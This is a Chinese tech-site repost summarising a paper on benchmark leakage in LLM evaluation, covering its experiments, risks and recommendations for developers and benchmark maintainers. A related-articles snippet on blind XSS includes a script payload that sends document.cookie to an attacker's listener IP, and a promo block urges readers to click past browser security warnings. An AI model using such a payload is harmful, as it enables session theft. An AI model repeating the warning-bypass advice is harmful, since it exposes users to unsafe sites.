小心你的大模型被基准评估坑了,模型直接傻掉!人大高瓴揭秘大模型作弊

news2025/1/10 19:05:16

作者 | 谢年年、Python

从 ChatGPT 横空出世到国内外「百模大战」打响以来,我们隔三差五就会看到某某大模型又超越多个模型,刷新SOTA,成功屠榜的消息。

这些榜单都是基于一系列高质量的评估基准创立的,从不同的方面比较LLMs的性能。典型的评估基准包括MMLU(用于衡量多任务语言理解能力)、Big-Bench(用于量化和外推LLMs的能力)以及AGIEval(用于评估应对人类级任务的能力)。

不同的评估基准就是一张张公开的试卷,LLMs参加考试以评估其能力。

既然是考试,公平公正就非常重要。但如果在考试之前LLMs已经偷看过原题或者做过模拟卷了呢,这种作弊行为势必会让模型效果大大提升。作弊的后果就是高估了大模型的能力,一到真实场景用户测试就露馅。

大模型研究测试传送门

GPT-4传送门(免墙,可直接测试,遇浏览器警告点高级/继续访问即可):
http://hujiaoai.cn

这类问题称作基准泄露,如下图所示,LLMs使用了与基准评估数据集相关或完全相同的数据进行训练,导致模型性能异常提升。

但这个问题有时候并不是模型研发人员有意为之,而可能是无意识地引发的。在准备预训练语料库时,我们可能并不知道未来的评估数据集是什么。而预训练语料与评估数据集都是从网上爬取的,因此预训练语料中很有可能包含了评估数据集部分内容。例如,GPT-3发现了CBT数据集被包含在预训练语料库中,LLaMA-2提到直接从网页上提取的BoolQ数据集可能包含在公开可用的语料库中。

再加上,训练语料库的详细构成(例如数据来源)通常被视为现有LLMs的核心“秘密”,因此,在进行基准评估时,难以对数据污染问题直接进行检查。

人大高瓴团队通过设置几个常见的基准泄露情景训练了四个流行的语言模型,并在多个现有基准上测试模型性能,详细揭示了基准泄露的潜在风险,并基于风险提出几项解决措施。研究结果将有助于更好地了解现有基准所带来的潜在偏见和局限性,帮助研究人员在评估LLMs时做出更明智的决策。

论文标题
Don’t Make Your LLM an Evaluation Benchmark Cheater

论文链接
https://arxiv.org/pdf/2311.01964.pdf

基准泄露的实验设置

基准泄露情景预设

一个评估基准通常包含一组测试样例,并依赖于固定的模板来提示LLMs进行评估。这样的评估过程可能存在三种类型的基准泄露风险:

  1. 测试提示泄露

  2. 测试集泄露

  3. 其他相关数据(例如训练集)包含到预训练语料库中。

本文将以上泄露情况交叉用于训练LLMs,具体来说设置如下:

  • 使用MMLU训练集:使用官方MMLU基准提供的辅助训练集训练大模型。

  • 使用所有训练集:除了MMLU训练集外,还使用了所有其他收集的评估基准的训练集进行训练。

  • 使用所有训练集+测试提示:使用所有训练集及其相应的测试提示例如任务描述和少样本演示进行训练。

  • 使用所有训练集、测试提示和测试集:这是最极端的情况,其中所有信息都被泄露。

评估基准

为了进行研究,本文选择了广泛使用的基准MMLU,并使用了一些问答、推理和阅读理解数据集进行评估。

  • MMLU:涵盖了57个任务,涉及数学、历史、科学和法律等各种知识领域,已成为评估LLMs是否拥有世界知识和解决问题的能力方面最常用的评估基准之一。本文报告了5-shot评估性能。

  • 开放域QA任务:LLMs应该完全基于内在知识回答问题。选择七个开放域QA数据集,包括BoolQ、PIQA、Hellaswag、WinoGrande、ARC Easy and Challenge、OpenBookQA,本文报告了zero-shot下的精度。

  • 推理任务:采用常识推理数据集CommonsenseQA ,以及两个常用的数学推理数据集GSM8k 和AQuA进行评估。使用思维链提示和重用提示评估模型的准确性。

  • 阅读理解任务:选择三个英文数据集RACE-Middle、RACEHigh、 CoQA 和两个中文数据集CMRC2018、C3-Dialog。

评估模型选择

为了深入分析基准泄露对评估性能的影响,作者选择了四个模型进行评估,这些模型都提供了预训练细节或进行了详尽的数据污染分析:

  • GPT-Neo-1.3B :是一种基于transformer的GPT-3架构模型;在Pile数据集上进行预训练

  • phi-1.5:在约27B tokens的“教科书质量”数据上训练的1.3B模型,虽然是小模型却可以达到与更大的模型相当的性能。

  • OpenLLaMA-3B:这是一个开源项目,基于LLaMA模型在超过1.2T tokens的RedPajama数据集上进行预训练。

  • LLaMA-2-7b :是LLaMA 2代,在大小约为2T tokens的公开在线数据上预训练。

结果与分析

下面两张表分别显示了三种基准泄露设置与原始LLMs在MMLU和QA任务以及推理和阅读理解任务上的比较:

表1 三种基准泄露设置与原始LLMs在MMLU和QA任务上的比较。

▲表1 三种基准泄露设置与原始LLMs在MMLU和QA任务上的比较。

表2 不同基准泄露设置与原始LLMs在推理和阅读理解任务上的比较

▲表2 不同基准泄露设置与原始LLMs在推理和阅读理解任务上的比较

实验结果显示:

  • 仅使用MMLU训练集可以大大提高MMLU基准上的评估结果。然而,这种改进会造成与MMLU无关的任务(如常识和数学知识的HellaSwag和GSM8k)性能下降,这表明过度强调特定任务可能会降低模型泛化能力

  • 随着数据泄露的严重程度,评估分数不断上升。当合并评估基准的所有训练集进行预训练时,几乎所有评估任务的性能都显著提高。

  • 另外测试提示是评估基准中不可忽视的重要信息,当测试提示被泄露时,1.3B大小的LLM甚至可以超过LLaMA 65B。因此在LLMs训练过程中,建议避免这种带有测试提示的特殊学习方式。

  • 极端设置下(灰色部分)1.3B LLM在大多数任务中优于65B LLM。显然,这种增长不可能说明1.3B模型强于65B,而是基准作弊在作怪。

除了带来虚假的性能提升以外,基准泄露还存在着一些潜在的风险~

基准泄露的潜在风险

1. 对其他任务产生副作用

在对泄露的基准数据进行训练后,可能会误导LLMs过度强调基准数据的特定知识和输出样式,而对其他任务产生副作用。

从下表结果中可以看到,在泄露数据上进行训练后,LLMs在两个文本生成数据集LAMBADA和XSum上的性能都有所下降。这表明基准泄露可能会对其他正常测试任务的性能产生负面影响。

表3 “+Leak”代表模型使用评估基准的所有训练集进行过预训练,其训练数据已经被泄露。

▲表3 “+Leak”代表模型使用评估基准的所有训练集进行过预训练,其训练数据已经被泄露。

2. 限制模型微调的能力

我们时常需要对LLMs进一步微调以达到某些特定目标,然而,在对泄露数据进行训练后,LLMs将被训练成拟合基准数据的模型,这可能影响模型微调后完成任务的能力。

为了研究数据泄露对LLMs微调能力的影响,作者采用了两个具有代表性的指令数据集Alpaca(主要包含自然语言指令)和CodeAlpaca(侧重于代码生成指令)分别对泄露以及未泄露的LLMs进行微调。结果显示,基准泄露的模型的性能不如未泄露的模型

这表明基准泄露极有可能限制了LLMs通过后续微调过程进行适应或改进的能力。

表4 指令调优后LLMs之间的比较,“IT”表示使用Alpaca和CodeAlpaca进行文本生成和代码合成任务的指令调优

▲表4 指令调优后LLMs之间的比较,“IT”表示使用Alpaca和CodeAlpaca进行文本生成和代码合成任务的指令调优

LLMs评估基准改进建议

基于以上讨论,为尽可能避免基准泄露风险,作者提出了以下建议,以改进LLMs现有的能力评估基准。

  • 应该使用来自不同来源的更多基准,涵盖基本能力(例如,文本生成)和高级能力测试(例如,复杂推理),以全面评估LLMs的能力。

对LLMs开发人员来说:

  • 严格检查预训练数据,避免在训练过程中包含任何后续的评估数据。比如可以使用n-gram(一般为n = 13)哈希算法来检查某些特定任务的预训练数据和评估数据之间的重叠度。

  • 建议将主流评测基准的训练数据从预训练数据中剔除。

  • 当在某些评估基准上展示结果时,建议指出任何潜在的数据污染风险,并报告重叠度等污染分析参数,具体报告可以参照LLaMA-2。

  • 展示更详细的预训练数据组成结构,特别是与主流评估基准相关的数据集,以方便公众检查潜在泄露风险。

对基准维护者的建议:

  • 提供构建基准的数据源细节,使用主流预训练语料库对当前数据集进行污染分析。基准应该明确指出常用的预训练数据集可能存在的污染风险。

  • 建议提交者附上特定污染分析报告,以便检查预训练数据和评估数据(包括训练和测试数据)之间的语义相关性。

  • 为测试提供多样化的提示。最终的评估结果应该是多个提示多次运行的平均值。它有助于降低特定提示的敏感性,提高模型结果的可靠性。

结论

本文探讨了基准泄露对LLMs评估的潜在风险和影响。数据泄露会极大地提升LLMs(即使是小模型)的基准测试结果,使评估变得不公平和不可信。这个问题很难从预训练阶段完全消除,因此作者提出了一些有用的指导方针来改进现有评估基准的使用方案。

更重要的是,LLM开发人员和基准测试维护人员在解释和使用排行榜的结果时应该充分意识到数据污染问题,共同努力,一起打造一个公平公正的模型性能评估环境。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1195684.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【VastbaseG100】 The password has been expired, please change the password.

NOTICE: The password has been expired, please change the password. vsql ((Vastbase G100 V2.2 (Build 10) Release) compiled at 2022-09-18 13:48:47 commit 9104 last mr ) 非SSL连接(安全性要求高时,建议使用SSL连接) 输入 "h…

xss 盲打

XSS 盲打 为什么教盲打&#xff0c;是因为处于被动&#xff0c;要等待受害者触发 1.利用存储型XSS 先将代码写入留言。同时kali开启端口监听&#xff08;下面IP是kali的&#xff09; <script>document.write(\<img src\"http://10.9.47.79/\document.cookie\\&qu…

Python开源项目RestoreFormer(++)——人脸重建(Face Restoration),模糊清晰、划痕修复及黑白上色的实践

有关 python anaconda 及运行环境的安装与设置请参阅&#xff1a; Python开源项目CodeFormer——人脸重建&#xff08;Face Restoration&#xff09;&#xff0c;模糊清晰、划痕修复及黑白上色的实践https://blog.csdn.net/beijinghorn/article/details/134334021 1 RESTOREF…

3.1 IDA Pro编写IDC脚本入门

IDA Pro内置的IDC脚本语言是一种灵活的、C语言风格的脚本语言&#xff0c;旨在帮助逆向工程师更轻松地进行反汇编和静态分析。IDC脚本语言支持变量、表达式、循环、分支、函数等C语言中的常见语法结构&#xff0c;并且还提供了许多特定于反汇编和静态分析的函数和操作符。由于其…

程序员的护城河:技术、创新与软实力的完美融合

作为IT行业的从业者&#xff0c;我们深知程序员在保障系统安全、数据防护以及网络稳定方面所起到的重要作用。他们是现代社会的护城河&#xff0c;用代码构筑着我们的未来。那程序员的护城河又是什么呢&#xff1f;是技术能力的深度&#xff1f;是对创新的追求&#xff1f;还是…

Linux 基于 LVM 逻辑卷的磁盘管理【简明教程】

一、传统磁盘管理的弊端 传统的磁盘管理&#xff1a;使用MBR先对硬盘分区&#xff0c;然后对分区进行文件系统的格式化最后再将该分区挂载上去。 传统的磁盘管理当分区没有空间使用进行扩展时&#xff0c;操作比较麻烦。分区使用空间已经满了&#xff0c;不再够用了&#xff…

Linux系统初步了解

Linux系统由4个主要部分组成&#xff1a;内核、Shell、文件系统和应用程序。 本专题主要是围绕这四个来展开的。 POSIX&#xff08;可移植操作系统接口&#xff09;定义了操作系统应该为应用程序提供的标准接口&#xff0c;其意愿是获得源码级别的软件可移植性。所以Linux选择…

程序员的那些坏习惯!来看看你有几个?

一、前言 写了20多年代码&#xff0c;我见过不下于4位数的程序员&#xff0c;我觉得程序员的能力水平可以分为4个阶段&#xff1a;线性级、逻辑级、架构级和工程级。 同样的在这些人当中&#xff0c;我也发现了8个程序员最常见的陋习&#xff0c;基本上可以覆盖90%的人&#…

高德资深技术专家孙蔚:海量用户应用数据库选型、升级实践

高德地图&#xff08;以下简称“高德”&#xff09;作为一款用户出行必备、拥有海量用户数据的导航软件&#xff0c;对系统运行稳定性要求极高。 一直以来&#xff0c;高德每时每刻都在生产的一些数据库中的数据已经达到数百 TB&#xff0c;数据量的增长不仅带来存储成本的迅速…

关于Office阻止访问嵌入对象的解决办法

问题 Word文档中想要下载嵌入的文件时被Office阻止了&#xff0c;无法下载。 解决办法 打开文件——选项——信任中心&#xff0c;在宏设置中启用所有宏&#xff0c;关于Macro、Acitve X插件等项目设置上&#xff0c;建议暂时全部设置为允许&#xff0c;看下相关对象的访问…

try-catch-finally执行以及他们在有return的情况下,基本数据类型、对象以及有异步赋值情况异同分析

这两天面试,遇到好几个人,都是那种我感觉我肚子里的墨水都吐出来完了,难不倒人家,于是问了下家里那位老狗,从最开始就念叨着你问他try-catch在有return的情况下怎么执行的,执行结果是啥,我前面没理,后面确实有点遭不住了,来看看吧,肚子里添点墨水,别把脸丢大了~ 做…

分布式搜索引擎ES

文章目录 初识elasticsearch了解ES倒排索引正向索引倒排索引正向和倒排 es的一些概念文档和字段索引和映射mysql与elasticsearch 安装ES部署kibana安装IK分词器扩展词词典停用词词典 索引库操作mapping映射属性索引库的CRUD创建索引库和映射查询索引库修改索引库删除索引库 文档…

MySQL 常见面试题总结:索引 InnoDB索引 MyISAM索引

1.关系型数据库&#xff08;MySQL&#xff09;和非关系型数据库(nosql)区别 存储方式&#xff1a;关系型以表的形式 非关系型以键值对形式 应用场景&#xff1a;关系型一致性要求较高&#xff0c;非关系型并发性要求较高 2. Mysql如何实现的索引机制&#xff1f; MySQL中索…

WAF入侵防御系统标准检查表

软件开发全文档获取&#xff1a;进主页

『Linux升级路』基础开发工具——vim篇

&#x1f525;博客主页&#xff1a;小王又困了 &#x1f4da;系列专栏&#xff1a;Linux &#x1f31f;人之为学&#xff0c;不日近则日退 ❤️感谢大家点赞&#x1f44d;收藏⭐评论✍️ 目录 一、vim的基本概念 &#x1f4d2;1.1命令模式 &#x1f4d2;1.2插入模式 &…

ENVI IDL:如何监测代码运行时间(计时器函数实现)?

01 预想 我预想的是在循环中加入一个函数&#xff0c;可以监测相邻两次循环的运行时间&#xff0c;正常操作如此&#xff1a; pro unknowfor ix 0, 5 do beginstart_timekeeping systime(1)wait, randomu(systime(1), 1) ; 此处systime(1)仅仅作为seed种子end_timekeeping…

C# DirectoryInfo类的用法

在C#中&#xff0c;DirectoryInfo类是System.IO命名空间中的一个类&#xff0c;用于操作文件夹&#xff08;目录&#xff09;。通过DirectoryInfo类&#xff0c;我们可以方便地创建、删除、移动和枚举文件夹。本文将详细介绍DirectoryInfo类的常用方法和属性&#xff0c;并提供…

拥抱中国发展新机遇,原知因制药再次亮相2023进博会

11月5日至10日&#xff0c;第六届进博会在国家会展中心&#xff08;上海&#xff09;成功举办。作为世界上首个以进口为主题的国家级博览会&#xff0c;进博会成为构建新发展格局的窗口、高水平开放的载体&#xff0c;持续为世界经济注入正能量。 原知因制药再次亮相进博会&am…

开放领域问答机器人1

开放领域问答机器人是一种智能机器人&#xff0c;它不受限制&#xff0c;可以回答任何问题。这种机器人主要通过自然语言处理技术来理解用户的问题&#xff0c;并从大量的数据中获取相关信息&#xff0c;以提供准确的答案。它的应用领域广泛&#xff0c;包括客户服务、教育、医…

网易云音乐未登录接口返回301

网易云音乐 NodeJS 版 API (neteasecloudmusicapi.js.org) 上面是网易云音乐的官方API接口文档 当我调用接口发送请求的时候部分接口数据是需要登录之后进行获取的&#xff0c;但是当我发送请求的时候原生js项目中的跨端问题是比较难解决的。 遇到的问题&#xff1a;跨端请求…